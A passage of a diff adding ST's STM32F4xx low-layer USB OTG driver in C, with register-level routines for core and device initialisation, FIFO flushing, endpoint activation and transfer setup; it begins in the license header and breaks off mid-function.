+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_LL_USB_DRIVER + * @{ + */ + +#if defined (HAL_PCD_MODULE_ENABLED) || defined (HAL_HCD_MODULE_ENABLED) +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +static HAL_StatusTypeDef USB_CoreReset(USB_OTG_GlobalTypeDef *USBx); + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup USB_LL_Exported_Functions USB Low Layer Exported Functions + * @{ + */ + +/** @defgroup USB_LL_Exported_Functions_Group1 Initialization/de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization/de-initialization functions ##### + =============================================================================== + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the USB Core + * @param USBx USB Instance + * @param cfg pointer to a USB_OTG_CfgTypeDef structure that contains + * the configuration information for the specified USBx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef USB_CoreInit(USB_OTG_GlobalTypeDef *USBx, USB_OTG_CfgTypeDef cfg) +{ + HAL_StatusTypeDef ret; + + if (cfg.phy_itface == USB_OTG_ULPI_PHY) + { + USBx->GCCFG &= ~(USB_OTG_GCCFG_PWRDWN); + + /* Init The ULPI Interface */ + USBx->GUSBCFG &= ~(USB_OTG_GUSBCFG_TSDPS | USB_OTG_GUSBCFG_ULPIFSLS | USB_OTG_GUSBCFG_PHYSEL); + + /* Select vbus source */ + USBx->GUSBCFG &= ~(USB_OTG_GUSBCFG_ULPIEVBUSD | USB_OTG_GUSBCFG_ULPIEVBUSI); + if (cfg.use_external_vbus == 1U) + { + USBx->GUSBCFG |= USB_OTG_GUSBCFG_ULPIEVBUSD; + } + + /* Reset after a PHY select */ + ret = USB_CoreReset(USBx); + } + else /* FS interface (embedded Phy) */ + { + /* Select FS Embedded PHY */ + USBx->GUSBCFG |= USB_OTG_GUSBCFG_PHYSEL; + + /* Reset after a PHY select */ + ret = USB_CoreReset(USBx); + + if (cfg.battery_charging_enable == 0U) + { + /* Activate the USB Transceiver */ + USBx->GCCFG |= USB_OTG_GCCFG_PWRDWN; + } + else + { + /* Deactivate the USB Transceiver */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_PWRDWN); + } + } + + if (cfg.dma_enable == 1U) + { + USBx->GAHBCFG |= USB_OTG_GAHBCFG_HBSTLEN_2; + USBx->GAHBCFG |= USB_OTG_GAHBCFG_DMAEN; + } + + return ret; +} + + +/** + * @brief Set the USB turnaround time + * @param USBx USB Instance + * @param hclk: AHB clock frequency + * @retval USB turnaround time In PHY Clocks number + */ +HAL_StatusTypeDef USB_SetTurnaroundTime(USB_OTG_GlobalTypeDef *USBx, + uint32_t hclk, uint8_t speed) +{ + uint32_t UsbTrd; + + /* The USBTRD is configured according to the tables below, depending on AHB frequency + used by application. In the low AHB frequency range it is used to stretch enough the USB response + time to IN tokens, the USB turnaround time, so to compensate for the longer AHB read access + latency to the Data FIFO */ + if (speed == USBD_FS_SPEED) + { + if ((hclk >= 14200000U) && (hclk < 15000000U)) + { + /* hclk Clock Range between 14.2-15 MHz */ + UsbTrd = 0xFU; + } + else if ((hclk >= 15000000U) && (hclk < 16000000U)) + { + /* hclk Clock Range between 15-16 MHz */ + UsbTrd = 0xEU; + } + else if ((hclk >= 16000000U) && (hclk < 17200000U)) + { + /* hclk Clock Range between 16-17.2 MHz */ + UsbTrd = 0xDU; + } + else if ((hclk >= 17200000U) && (hclk < 18500000U)) + { + /* hclk Clock Range between 17.2-18.5 MHz */ + UsbTrd = 0xCU; + } + else if ((hclk >= 18500000U) && (hclk < 20000000U)) + { + /* hclk Clock Range between 18.5-20 MHz */ + UsbTrd = 0xBU; + } + else if ((hclk >= 20000000U) && (hclk < 21800000U)) + { + /* hclk Clock Range between 20-21.8 MHz */ + UsbTrd = 0xAU; + } + else if ((hclk >= 21800000U) && (hclk < 24000000U)) + { + /* hclk Clock Range between 21.8-24 MHz */ + UsbTrd = 0x9U; + } + else if ((hclk >= 24000000U) && (hclk < 27700000U)) + { + /* hclk Clock Range between 24-27.7 MHz */ + UsbTrd = 0x8U; + } + else if ((hclk >= 27700000U) && (hclk < 32000000U)) + { + /* hclk Clock Range between 27.7-32 MHz */ + UsbTrd = 0x7U; + } + else /* if(hclk >= 32000000) */ + { + /* hclk Clock Range between 32-200 MHz */ + UsbTrd = 0x6U; + } + } + else if (speed == USBD_HS_SPEED) + { + UsbTrd = USBD_HS_TRDT_VALUE; + } + else + { + UsbTrd = USBD_DEFAULT_TRDT_VALUE; + } + + USBx->GUSBCFG &= ~USB_OTG_GUSBCFG_TRDT; + USBx->GUSBCFG |= (uint32_t)((UsbTrd << 10) & USB_OTG_GUSBCFG_TRDT); + + return HAL_OK; +} + +/** + * @brief USB_EnableGlobalInt + * Enables the controller's Global Int in the AHB Config reg + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_EnableGlobalInt(USB_OTG_GlobalTypeDef *USBx) +{ + USBx->GAHBCFG |= USB_OTG_GAHBCFG_GINT; + return HAL_OK; +} + +/** + * @brief USB_DisableGlobalInt + * Disable the controller's Global Int in the AHB Config reg + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_DisableGlobalInt(USB_OTG_GlobalTypeDef *USBx) +{ + USBx->GAHBCFG &= ~USB_OTG_GAHBCFG_GINT; + return HAL_OK; +} + +/** + * @brief USB_SetCurrentMode Set functional mode + * @param USBx Selected device + * @param mode current core mode + * This parameter can be one of these values: + * @arg USB_DEVICE_MODE Peripheral mode + * @arg USB_HOST_MODE Host mode + * @retval HAL status + */ +HAL_StatusTypeDef USB_SetCurrentMode(USB_OTG_GlobalTypeDef *USBx, USB_OTG_ModeTypeDef mode) +{ + uint32_t ms = 0U; + + USBx->GUSBCFG &= ~(USB_OTG_GUSBCFG_FHMOD | USB_OTG_GUSBCFG_FDMOD); + + if (mode == USB_HOST_MODE) + { + USBx->GUSBCFG |= USB_OTG_GUSBCFG_FHMOD; + + do + { + HAL_Delay(1U); + ms++; + } while ((USB_GetMode(USBx) != (uint32_t)USB_HOST_MODE) && (ms < 50U)); + } + else if (mode == USB_DEVICE_MODE) + { + USBx->GUSBCFG |= USB_OTG_GUSBCFG_FDMOD; + + do + { + HAL_Delay(1U); + ms++; + } while ((USB_GetMode(USBx) != (uint32_t)USB_DEVICE_MODE) && (ms < 50U)); + } + else + { + return HAL_ERROR; + } + + if (ms == 50U) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief USB_DevInit Initializes the USB_OTG controller registers + * for device mode + * @param USBx Selected device + * @param cfg pointer to a USB_OTG_CfgTypeDef structure that contains + * the configuration information for the specified USBx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef USB_DevInit(USB_OTG_GlobalTypeDef *USBx, USB_OTG_CfgTypeDef cfg) +{ + HAL_StatusTypeDef ret = HAL_OK; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t i; + + for (i = 0U; i < 15U; i++) + { + USBx->DIEPTXF[i] = 0U; + } + +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /* VBUS Sensing setup */ + if (cfg.vbus_sensing_enable == 0U) + { + USBx_DEVICE->DCTL |= USB_OTG_DCTL_SDIS; + + /* Deactivate VBUS Sensing B */ + USBx->GCCFG &= ~USB_OTG_GCCFG_VBDEN; + + /* B-peripheral session valid override enable */ + USBx->GOTGCTL |= USB_OTG_GOTGCTL_BVALOEN; + USBx->GOTGCTL |= USB_OTG_GOTGCTL_BVALOVAL; + } + else + { + /* Enable HW VBUS sensing */ + USBx->GCCFG |= USB_OTG_GCCFG_VBDEN; + } +#else + /* VBUS Sensing setup */ + if (cfg.vbus_sensing_enable == 0U) + { + /* + * Disable HW VBUS sensing. VBUS is internally considered to be always + * at VBUS-Valid level (5V). + */ + USBx_DEVICE->DCTL |= USB_OTG_DCTL_SDIS; + USBx->GCCFG |= USB_OTG_GCCFG_NOVBUSSENS; + USBx->GCCFG &= ~USB_OTG_GCCFG_VBUSBSEN; + USBx->GCCFG &= ~USB_OTG_GCCFG_VBUSASEN; + } + else + { + /* Enable HW VBUS sensing */ + USBx->GCCFG &= ~USB_OTG_GCCFG_NOVBUSSENS; + USBx->GCCFG |= USB_OTG_GCCFG_VBUSBSEN; + } +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ + + /* Restart the Phy Clock */ + USBx_PCGCCTL = 0U; + + /* Device mode configuration */ + USBx_DEVICE->DCFG |= DCFG_FRAME_INTERVAL_80; + + if (cfg.phy_itface == USB_OTG_ULPI_PHY) + { + if (cfg.speed == USBD_HS_SPEED) + { + /* Set Core speed to High speed mode */ + (void)USB_SetDevSpeed(USBx, USB_OTG_SPEED_HIGH); + } + else + { + /* Set Core speed to Full speed mode */ + (void)USB_SetDevSpeed(USBx, USB_OTG_SPEED_HIGH_IN_FULL); + } + } + else + { + /* Set Core speed to Full speed mode */ + (void)USB_SetDevSpeed(USBx, USB_OTG_SPEED_FULL); + } + + /* Flush the FIFOs */ + if (USB_FlushTxFifo(USBx, 0x10U) != HAL_OK) /* all Tx FIFOs */ + { + ret = HAL_ERROR; + } + + if (USB_FlushRxFifo(USBx) != HAL_OK) + { + ret = HAL_ERROR; + } + + /* Clear all pending Device Interrupts */ + USBx_DEVICE->DIEPMSK = 0U; + USBx_DEVICE->DOEPMSK = 0U; + USBx_DEVICE->DAINTMSK = 0U; + + for (i = 0U; i < cfg.dev_endpoints; i++) + { + if ((USBx_INEP(i)->DIEPCTL & USB_OTG_DIEPCTL_EPENA) == USB_OTG_DIEPCTL_EPENA) + { + if (i == 0U) + { + USBx_INEP(i)->DIEPCTL = USB_OTG_DIEPCTL_SNAK; + } + else + { + USBx_INEP(i)->DIEPCTL = USB_OTG_DIEPCTL_EPDIS | USB_OTG_DIEPCTL_SNAK; + } + } + else + { + USBx_INEP(i)->DIEPCTL = 0U; + } + + USBx_INEP(i)->DIEPTSIZ = 0U; + USBx_INEP(i)->DIEPINT = 0xFB7FU; + } + + for (i = 0U; i < cfg.dev_endpoints; i++) + { + if ((USBx_OUTEP(i)->DOEPCTL & USB_OTG_DOEPCTL_EPENA) == USB_OTG_DOEPCTL_EPENA) + { + if (i == 0U) + { + USBx_OUTEP(i)->DOEPCTL = USB_OTG_DOEPCTL_SNAK; + } + else + { + USBx_OUTEP(i)->DOEPCTL = USB_OTG_DOEPCTL_EPDIS | USB_OTG_DOEPCTL_SNAK; + } + } + else + { + USBx_OUTEP(i)->DOEPCTL = 0U; + } + + USBx_OUTEP(i)->DOEPTSIZ = 0U; + USBx_OUTEP(i)->DOEPINT = 0xFB7FU; + } + + USBx_DEVICE->DIEPMSK &= ~(USB_OTG_DIEPMSK_TXFURM); + + /* Disable all interrupts. */ + USBx->GINTMSK = 0U; + + /* Clear any pending interrupts */ + USBx->GINTSTS = 0xBFFFFFFFU; + + /* Enable the common interrupts */ + if (cfg.dma_enable == 0U) + { + USBx->GINTMSK |= USB_OTG_GINTMSK_RXFLVLM; + } + + /* Enable interrupts matching to the Device mode ONLY */ + USBx->GINTMSK |= USB_OTG_GINTMSK_USBSUSPM | USB_OTG_GINTMSK_USBRST | + USB_OTG_GINTMSK_ENUMDNEM | USB_OTG_GINTMSK_IEPINT | + USB_OTG_GINTMSK_OEPINT | USB_OTG_GINTMSK_IISOIXFRM | + USB_OTG_GINTMSK_PXFRM_IISOOXFRM | USB_OTG_GINTMSK_WUIM; + + if (cfg.Sof_enable != 0U) + { + USBx->GINTMSK |= USB_OTG_GINTMSK_SOFM; + } + + if (cfg.vbus_sensing_enable == 1U) + { + USBx->GINTMSK |= (USB_OTG_GINTMSK_SRQIM | USB_OTG_GINTMSK_OTGINT); + } + + return ret; +} + +/** + * @brief USB_OTG_FlushTxFifo : Flush a Tx FIFO + * @param USBx Selected device + * @param num FIFO number + * This parameter can be a value from 1 to 15 + 15 means Flush all Tx FIFOs + * @retval HAL status + */ +HAL_StatusTypeDef USB_FlushTxFifo(USB_OTG_GlobalTypeDef *USBx, uint32_t num) +{ + __IO uint32_t count = 0U; + + USBx->GRSTCTL = (USB_OTG_GRSTCTL_TXFFLSH | (num << 6)); + + do + { + if (++count > 200000U) + { + return HAL_TIMEOUT; + } + } while ((USBx->GRSTCTL & USB_OTG_GRSTCTL_TXFFLSH) == USB_OTG_GRSTCTL_TXFFLSH); + + return HAL_OK; +} + +/** + * @brief USB_FlushRxFifo : Flush Rx FIFO + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_FlushRxFifo(USB_OTG_GlobalTypeDef *USBx) +{ + __IO uint32_t count = 0U; + + USBx->GRSTCTL = USB_OTG_GRSTCTL_RXFFLSH; + + do + { + if (++count > 200000U) + { + return HAL_TIMEOUT; + } + } while ((USBx->GRSTCTL & USB_OTG_GRSTCTL_RXFFLSH) == USB_OTG_GRSTCTL_RXFFLSH); + + return HAL_OK; +} + +/** + * @brief USB_SetDevSpeed Initializes the DevSpd field of DCFG register + * depending the PHY type and the enumeration speed of the device. + * @param USBx Selected device + * @param speed device speed + * This parameter can be one of these values: + * @arg USB_OTG_SPEED_HIGH: High speed mode + * @arg USB_OTG_SPEED_HIGH_IN_FULL: High speed core in Full Speed mode + * @arg USB_OTG_SPEED_FULL: Full speed mode + * @retval Hal status + */ +HAL_StatusTypeDef USB_SetDevSpeed(USB_OTG_GlobalTypeDef *USBx, uint8_t speed) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + USBx_DEVICE->DCFG |= speed; + return HAL_OK; +} + +/** + * @brief USB_GetDevSpeed Return the Dev Speed + * @param USBx Selected device + * @retval speed device speed + * This parameter can be one of these values: + * @arg USBD_HS_SPEED: High speed mode + * @arg USBD_FS_SPEED: Full speed mode + */ +uint8_t USB_GetDevSpeed(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint8_t speed; + uint32_t DevEnumSpeed = USBx_DEVICE->DSTS & USB_OTG_DSTS_ENUMSPD; + + if (DevEnumSpeed == DSTS_ENUMSPD_HS_PHY_30MHZ_OR_60MHZ) + { + speed = USBD_HS_SPEED; + } + else if ((DevEnumSpeed == DSTS_ENUMSPD_FS_PHY_30MHZ_OR_60MHZ) || + (DevEnumSpeed == DSTS_ENUMSPD_FS_PHY_48MHZ)) + { + speed = USBD_FS_SPEED; + } + else + { + speed = 0xFU; + } + + return speed; +} + +/** + * @brief Activate and configure an endpoint + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_ActivateEndpoint(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + if (ep->is_in == 1U) + { + USBx_DEVICE->DAINTMSK |= USB_OTG_DAINTMSK_IEPM & (uint32_t)(1UL << (ep->num & EP_ADDR_MSK)); + + if ((USBx_INEP(epnum)->DIEPCTL & USB_OTG_DIEPCTL_USBAEP) == 0U) + { + USBx_INEP(epnum)->DIEPCTL |= (ep->maxpacket & USB_OTG_DIEPCTL_MPSIZ) | + ((uint32_t)ep->type << 18) | (epnum << 22) | + USB_OTG_DIEPCTL_SD0PID_SEVNFRM | + USB_OTG_DIEPCTL_USBAEP; + } + } + else + { + USBx_DEVICE->DAINTMSK |= USB_OTG_DAINTMSK_OEPM & ((uint32_t)(1UL << (ep->num & EP_ADDR_MSK)) << 16); + + if (((USBx_OUTEP(epnum)->DOEPCTL) & USB_OTG_DOEPCTL_USBAEP) == 0U) + { + USBx_OUTEP(epnum)->DOEPCTL |= (ep->maxpacket & USB_OTG_DOEPCTL_MPSIZ) | + ((uint32_t)ep->type << 18) | + USB_OTG_DIEPCTL_SD0PID_SEVNFRM | + USB_OTG_DOEPCTL_USBAEP; + } + } + return HAL_OK; +} + +/** + * @brief Activate and configure a dedicated endpoint + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_ActivateDedicatedEndpoint(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + /* Read DEPCTLn register */ + if (ep->is_in == 1U) + { + if (((USBx_INEP(epnum)->DIEPCTL) & USB_OTG_DIEPCTL_USBAEP) == 0U) + { + USBx_INEP(epnum)->DIEPCTL |= (ep->maxpacket & USB_OTG_DIEPCTL_MPSIZ) | + ((uint32_t)ep->type << 18) | (epnum << 22) | + USB_OTG_DIEPCTL_SD0PID_SEVNFRM | + USB_OTG_DIEPCTL_USBAEP; + } + + USBx_DEVICE->DEACHMSK |= USB_OTG_DAINTMSK_IEPM & (uint32_t)(1UL << (ep->num & EP_ADDR_MSK)); + } + else + { + if (((USBx_OUTEP(epnum)->DOEPCTL) & USB_OTG_DOEPCTL_USBAEP) == 0U) + { + USBx_OUTEP(epnum)->DOEPCTL |= (ep->maxpacket & USB_OTG_DOEPCTL_MPSIZ) | + ((uint32_t)ep->type << 18) | (epnum << 22) | + USB_OTG_DOEPCTL_USBAEP; + } + + USBx_DEVICE->DEACHMSK |= USB_OTG_DAINTMSK_OEPM & ((uint32_t)(1UL << (ep->num & EP_ADDR_MSK)) << 16); + } + + return HAL_OK; +} + +/** + * @brief De-activate and de-initialize an endpoint + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_DeactivateEndpoint(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + /* Read DEPCTLn register */ + if (ep->is_in == 1U) + { + if ((USBx_INEP(epnum)->DIEPCTL & USB_OTG_DIEPCTL_EPENA) == USB_OTG_DIEPCTL_EPENA) + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SNAK; + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_EPDIS; + } + + USBx_DEVICE->DEACHMSK &= ~(USB_OTG_DAINTMSK_IEPM & (uint32_t)(1UL << (ep->num & EP_ADDR_MSK))); + USBx_DEVICE->DAINTMSK &= ~(USB_OTG_DAINTMSK_IEPM & (uint32_t)(1UL << (ep->num & EP_ADDR_MSK))); + USBx_INEP(epnum)->DIEPCTL &= ~(USB_OTG_DIEPCTL_USBAEP | + USB_OTG_DIEPCTL_MPSIZ | + USB_OTG_DIEPCTL_TXFNUM | + USB_OTG_DIEPCTL_SD0PID_SEVNFRM | + USB_OTG_DIEPCTL_EPTYP); + } + else + { + if ((USBx_OUTEP(epnum)->DOEPCTL & USB_OTG_DOEPCTL_EPENA) == USB_OTG_DOEPCTL_EPENA) + { + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_SNAK; + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_EPDIS; + } + + USBx_DEVICE->DEACHMSK &= ~(USB_OTG_DAINTMSK_OEPM & ((uint32_t)(1UL << (ep->num & EP_ADDR_MSK)) << 16)); + USBx_DEVICE->DAINTMSK &= ~(USB_OTG_DAINTMSK_OEPM & ((uint32_t)(1UL << (ep->num & EP_ADDR_MSK)) << 16)); + USBx_OUTEP(epnum)->DOEPCTL &= ~(USB_OTG_DOEPCTL_USBAEP | + USB_OTG_DOEPCTL_MPSIZ | + USB_OTG_DOEPCTL_SD0PID_SEVNFRM | + USB_OTG_DOEPCTL_EPTYP); + } + + return HAL_OK; +} + +/** + * @brief De-activate and de-initialize a dedicated endpoint + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_DeactivateDedicatedEndpoint(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + /* Read DEPCTLn register */ + if (ep->is_in == 1U) + { + if ((USBx_INEP(epnum)->DIEPCTL & USB_OTG_DIEPCTL_EPENA) == USB_OTG_DIEPCTL_EPENA) + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SNAK; + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_EPDIS; + } + + USBx_INEP(epnum)->DIEPCTL &= ~ USB_OTG_DIEPCTL_USBAEP; + USBx_DEVICE->DAINTMSK &= ~(USB_OTG_DAINTMSK_IEPM & (uint32_t)(1UL << (ep->num & EP_ADDR_MSK))); + } + else + { + if ((USBx_OUTEP(epnum)->DOEPCTL & USB_OTG_DOEPCTL_EPENA) == USB_OTG_DOEPCTL_EPENA) + { + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_SNAK; + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_EPDIS; + } + + USBx_OUTEP(epnum)->DOEPCTL &= ~USB_OTG_DOEPCTL_USBAEP; + USBx_DEVICE->DAINTMSK &= ~(USB_OTG_DAINTMSK_OEPM & ((uint32_t)(1UL << (ep->num & EP_ADDR_MSK)) << 16)); + } + + return HAL_OK; +} + +/** + * @brief USB_EPStartXfer : setup and starts a transfer over an EP + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @param dma USB dma enabled or disabled + * This parameter can be one of these values: + * 0 : DMA feature not used + * 1 : DMA feature used + * @retval HAL status + */ +HAL_StatusTypeDef USB_EPStartXfer(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep, uint8_t dma) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + uint16_t pktcnt; + + /* IN endpoint */ + if (ep->is_in == 1U) + { + /* Zero Length Packet? */ + if (ep->xfer_len == 0U) + { + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_PKTCNT); + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_PKTCNT & (1U << 19)); + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_XFRSIZ); + } + else + { + /* Program the transfer size and packet count + * as follows: xfersize = N * maxpacket + + * short_packet pktcnt = N + (short_packet + * exist ? 1 : 0) + */ + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_XFRSIZ); + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_PKTCNT); + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_PKTCNT & + (((ep->xfer_len + ep->maxpacket - 1U) / ep->maxpacket) << 19)); + + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_XFRSIZ & ep->xfer_len); + + if (ep->type == EP_TYPE_ISOC) + { + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_MULCNT); + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_MULCNT & (1U << 29)); + } + } + + if (dma == 1U) + { + if ((uint32_t)ep->dma_addr != 0U) + { + USBx_INEP(epnum)->DIEPDMA = (uint32_t)(ep->dma_addr); + } + + if (ep->type == EP_TYPE_ISOC) + { + if ((USBx_DEVICE->DSTS & (1U << 8)) == 0U) + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SODDFRM; + } + else + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SD0PID_SEVNFRM; + } + } + + /* EP enable, IN data in FIFO */ + USBx_INEP(epnum)->DIEPCTL |= (USB_OTG_DIEPCTL_CNAK | USB_OTG_DIEPCTL_EPENA); + } + else + { + /* EP enable, IN data in FIFO */ + USBx_INEP(epnum)->DIEPCTL |= (USB_OTG_DIEPCTL_CNAK | USB_OTG_DIEPCTL_EPENA); + + if (ep->type != EP_TYPE_ISOC) + { + /* Enable the Tx FIFO Empty Interrupt for this EP */ + if (ep->xfer_len > 0U) + { + USBx_DEVICE->DIEPEMPMSK |= 1UL << (ep->num & EP_ADDR_MSK); + } + } + else + { + if ((USBx_DEVICE->DSTS & (1U << 8)) == 0U) + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SODDFRM; + } + else + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SD0PID_SEVNFRM; + } + + (void)USB_WritePacket(USBx, ep->xfer_buff, ep->num, (uint16_t)ep->xfer_len, dma); + } + } + } + else /* OUT endpoint */ + { + /* Program the transfer size and packet count as follows: + * pktcnt = N + * xfersize = N * maxpacket + */ + USBx_OUTEP(epnum)->DOEPTSIZ &= ~(USB_OTG_DOEPTSIZ_XFRSIZ); + USBx_OUTEP(epnum)->DOEPTSIZ &= ~(USB_OTG_DOEPTSIZ_PKTCNT); + + if (ep->xfer_len == 0U) + { + USBx_OUTEP(epnum)->DOEPTSIZ |= (USB_OTG_DOEPTSIZ_XFRSIZ & ep->maxpacket); + USBx_OUTEP(epnum)->DOEPTSIZ |= (USB_OTG_DOEPTSIZ_PKTCNT & (1U << 19)); + } + else + { + pktcnt = (uint16_t)((ep->xfer_len + ep->maxpacket - 1U) / ep->maxpacket); + USBx_OUTEP(epnum)->DOEPTSIZ |= USB_OTG_DOEPTSIZ_PKTCNT & ((uint32_t)pktcnt << 19); + USBx_OUTEP(epnum)->DOEPTSIZ |= USB_OTG_DOEPTSIZ_XFRSIZ & (ep->maxpacket * pktcnt); + } + + if (dma == 1U) + { + if ((uint32_t)ep->xfer_buff != 0U) + { + USBx_OUTEP(epnum)->DOEPDMA = (uint32_t)(ep->xfer_buff); + } + } + + if (ep->type == EP_TYPE_ISOC) + { + if ((USBx_DEVICE->DSTS & (1U << 8)) == 0U) + { + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_SODDFRM; + } + else + { + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_SD0PID_SEVNFRM; + } + } + /* EP enable */ + USBx_OUTEP(epnum)->DOEPCTL |= (USB_OTG_DOEPCTL_CNAK | USB_OTG_DOEPCTL_EPENA); + } + + return HAL_OK; +} + +/** + * @brief USB_EP0StartXfer : setup and starts a transfer over the EP 0 + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @param dma USB dma enabled or disabled + * This parameter can be one of these values: + * 0 : DMA feature not used + * 1 : DMA feature used + * @retval HAL status + */ +HAL_StatusTypeDef USB_EP0StartXfer(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep, uint8_t dma) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + /* IN endpoint */ + if (ep->is_in == 1U) + { + /* Zero Length Packet? */ + if (ep->xfer_len == 0U) + { + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_PKTCNT); + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_PKTCNT & (1U << 19)); + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_XFRSIZ); + } + else + { + /* Program the transfer size and packet count + * as follows: xfersize = N * maxpacket + + * short_packet pktcnt = N + (short_packet + * exist ? 1 : 0) + */ + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_XFRSIZ); + USBx_INEP(epnum)->DIEPTSIZ &= ~(USB_OTG_DIEPTSIZ_PKTCNT); + + if (ep->xfer_len > ep->maxpacket) + { + ep->xfer_len = ep->maxpacket; + } + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_PKTCNT & (1U << 19)); + USBx_INEP(epnum)->DIEPTSIZ |= (USB_OTG_DIEPTSIZ_XFRSIZ & ep->xfer_len); + } + + if (dma == 1U) + { + if ((uint32_t)ep->dma_addr != 0U) + { + USBx_INEP(epnum)->DIEPDMA = (uint32_t)(ep->dma_addr); + } + + /* EP enable, IN data in FIFO */ + USBx_INEP(epnum)->DIEPCTL |= (USB_OTG_DIEPCTL_CNAK | USB_OTG_DIEPCTL_EPENA); + } + else + { + /* EP enable, IN data in FIFO */ + USBx_INEP(epnum)->DIEPCTL |= (USB_OTG_DIEPCTL_CNAK | USB_OTG_DIEPCTL_EPENA); + + /* Enable the Tx FIFO Empty Interrupt for this EP */ + if (ep->xfer_len > 0U) + { + USBx_DEVICE->DIEPEMPMSK |= 1UL << (ep->num & EP_ADDR_MSK); + } + } + } + else /* OUT endpoint */ + { + /* Program the transfer size and packet count as follows: + * pktcnt = N + * xfersize = N * maxpacket + */ + USBx_OUTEP(epnum)->DOEPTSIZ &= ~(USB_OTG_DOEPTSIZ_XFRSIZ); + USBx_OUTEP(epnum)->DOEPTSIZ &= ~(USB_OTG_DOEPTSIZ_PKTCNT); + + if (ep->xfer_len > 0U) + { 